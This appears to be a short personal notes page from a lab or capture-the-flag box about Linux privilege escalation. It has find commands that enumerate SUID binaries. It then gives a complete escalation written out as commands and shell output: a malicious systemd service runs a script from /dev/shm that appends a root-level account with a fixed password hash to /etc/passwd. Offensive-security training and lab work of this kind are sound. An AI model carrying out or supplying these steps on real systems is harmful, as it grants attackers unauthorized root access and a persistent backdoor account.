Comment on page
SUID wins!
SUID- it runs the file with the permissions of the file owner. (if the file owner is root, we can run it as root)
Find:
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null
OR
create a service that executes
/dev/shm/root.sh
:[Unit]
Description=pwned
[Service]
ExecStart=/dev/shm/root.sh
[Install]
WantedBy=multi-user.target
created
/dev/shm/root.sh
which echoes:rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash
pepper@jarvis:/dev/shm$ nano root.service
pepper@jarvis:/dev/shm$ cat root.service
[Unit]
Description=pwned
[Service]
ExecStart=/dev/shm/root.sh
[Install]
WantedBy=multi-user.target
pepper@jarvis:/dev/shm$ nano root.sh
pepper@jarvis:/dev/shm$ chmod +x root.sh
pepper@jarvis:/dev/shm$ cat root.sh
#!/bin/bash
echo 'rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash' >> /etc/passwd
pepper@jarvis:/dev/shm$
I enabled the service and started it:
pepper@jarvis:/dev/shm$ systemctl enable /dev/shm/root.service
Created symlink /etc/systemd/system/multi-user.target.wants/root.service -> /dev/shm/root.service.
Created symlink /etc/systemd/system/root.service -> /dev/shm/root.service.
pepper@jarvis:/dev/shm$ systemctl start root.service
pepper@jarvis:/dev/shm$
Check /etc/passwd
and su rooot with the creds
Last modified 1yr ago